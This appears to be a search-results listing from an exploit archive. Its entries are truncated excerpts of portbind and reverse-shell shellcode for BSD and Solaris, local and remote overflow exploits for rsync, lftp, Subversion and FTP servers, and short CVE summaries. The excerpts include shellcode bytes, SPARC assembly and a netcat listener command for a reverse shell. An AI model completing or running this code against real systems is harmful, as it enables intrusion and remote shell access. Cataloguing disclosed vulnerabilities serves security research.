2748 matches found
bsd/x86 portbind port random 143 bytes
Exploit for bsd/x86 platform in category shellcode ====================================== bsd/x86 portbind port random 143 bytes ====================================== Here is a BSD remote shellcode. Tested on NetBSD. Should work on FreeBSD and OpenBSD. by MayheM ExileCrew www.exile2k.org / 143...
solaris/SPARC portbind port 6789 228 bytes
solaris/SPARC portbind port 6789 228 bytes. Shellcode exploit for solarissparc platform / Solaris shellcode - connects /bin/sh to a port Claes M. Nyberg 20020624 , / include / void mainvoid asm" ! Server address xor %l1, %l1, %l1 ! l1 = 0 st %l1, %sp - 12 ! 0 INADDRANY mov 0x2, %l1 ! AFINET sth...
bsd/x86 - reverse portbind 129 bytes
bsd/x86 reverse portbind 129 bytes. Shellcode exploit for bsdx86 platform / reverse-portshell BSD shellcode by noir / / local usage: ./reverse-shell 192.168.2.33 / / remote: nc -n -v -v -l -p 6969 / / listen on 6969/tcp / / [email protected] / char shellcode = 0x31,0xc9,0x51,0x41,...
AOL Instant Messenger AIM - 'Away' Message Local Overflow
/ subject: local PoC exploit for AIM 5.5.3595 vendor: http://www.aim.com cve: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0636 credits: Matt Murphy date: 10 August 2004 notes: exploits locally if an argument is supplied, otherwise prints the url. offsets are based on exe/dll provide...
Subversion 1.0.2 svn_time_from_cstring() Remote Exploit
Exploit for linux platform in category remote exploits ======================================================= Subversion 1.0.2 svn_time_from_cstring() Remote Exploit ======================================================= / subversion-1.0.2 exploit by Gyan Chawdhary ... exploits a stack overflow in t...
PSOProxy 0.91 Remote Buffer Overflow Exploit (Win2k/XP)
Exploit for unknown platform in category remote exploits ======================================================= PSOProxy 0.91 Remote Buffer Overflow Exploit Win2k/XP ======================================================= / Copyright ? Rosiello Security http www rosiello org ================ -==...
rsync 2.5.7 - Local Stack Overflow Local Privilege Escalation
rsync 2.5.7 - Local Stack Overflow Local Privilege Escalation / rsync / Includes for code to daemonize / include include include include // define PATH "/usr/local/bin/rsync" define BUFFSIZE 100 //define RET 0xbffffdfb / 88 bytes portbinding shellcode - linux-x86 - by bighawk bighawk warfare com...
rsync 2.5.7 - Local Stack Overflow / Local Privilege Escalation
/ rsync / Includes for code to daemonize / include include include include // define PATH "/usr/local/bin/rsync" define BUFFSIZE 100 //define RET 0xbffffdfb / 88 bytes portbinding shellcode - linux-x86 - by bighawk bighawk warfare com This shellcode binds a shell on port 10000 stdin, stdout and...
rsync <= 2.5.7 Local stack overflow Root Exploit
Exploit for linux platform in category local exploits ================================================ rsync / Includes for code to daemonize / include include include include // define PATH "/usr/local/bin/rsync" define BUFFSIZE 100 //define RET 0xbffffdfb / 88 bytes portbinding shellcode -...
Dream FTP 1.2 Remote Format String Exploit
Exploit for unknown platform in category remote exploits ========================================== Dream FTP 1.2 Remote Format String Exploit ========================================== include include include include // WIN NT/2K/XP cmd.exe shellcode // kernel32.dll baseaddress calculation:...
lftp 2.6.9 - Remote Stack Overflow
lftp 2.6.9 - Remote Stack Overflow / lftp remote stack-based overflow exploit by Li0n7 voila fr Vulnerability discovered by Ulf Harnhammar Ulf.Harnhammar.9485 student uu se Lftp versions later than 2.6.10 are prone to a remotely exploitable stack-based overflow in trynetscapeproxy and trysquideplf...
CVE-2003-0809
Internet Explorer 5.01 through 6.0 does not properly handle object tags returned from a Web server during XML data binding, which allows remote attackers to execute arbitrary code via an HTML e-mail message or web page...
MS Frontpage Server Extensions fp30reg.dll Exploit (MS03-051)
Exploit for unknown platform in category remote exploits ============================================================= MS Frontpage Server Extensions fp30reg.dll Exploit MS03-051 ============================================================= / Frontpage fp30reg.dll Overflow MS03-051 discovered by...
CVE-2003-0809
Microsoft Internet Explorer 5.01–6.0 is affected by CVE-2003-0809 due to improper handling of object tags returned from a Web server during XML data binding, enabling remote code execution via HTML email or web pages. Affected software: IE 5.01–6.0. Root cause: object/HTML data binding issue in I...
Half-Life StatsMe 2.6.x Plugin - CMD_ARGV Buffer Overflow
Half-Life StatsMe 2.6.x Plugin - CMD_ARGV Buffer Overflow // source: https://www.securityfocus.com/bid/6575/info // The Half-Life StatsMe plug-in is prone to an exploitable buffer overflow condition. This issue may be exploited by an attacker who can authenticate with the rcon-password of the...
Half-Life StatsMe 2.6.x Plugin - MakeStats Format String
// source: https://www.securityfocus.com/bid/6578/info // The Half-Life StatsMe plug-in is prone to an exploitable format string vulnerability. This issue may be exploited by an attacker who can authenticate with the rcon-password of the Half-Life server to execute arbitrary code in the context o...
cryptcat does not encrypt data communications when -e command argument is used
Overview: With certain options used, cryptcat does not encrypt network connections as expected. Description: Cryptcat is an enhanced version of netcat that adds twofish encryption. If cryptcat is started in listen server mode binding a shell to a network port, cryptcat fails to enable encryption...
CVE-2001-1065
Web-based configuration utility in Cisco 600 series routers running CBOS 2.0.1 through 2.4.2ap binds itself to port 80 even when web-based configuration services are disabled, which could leave the router open to attack...
CVE-2001-1433
Cherokee web server before 0.2.7 does not properly drop root privileges after binding to port 80, which could allow remote attackers to gain privileges via other vulnerabilities...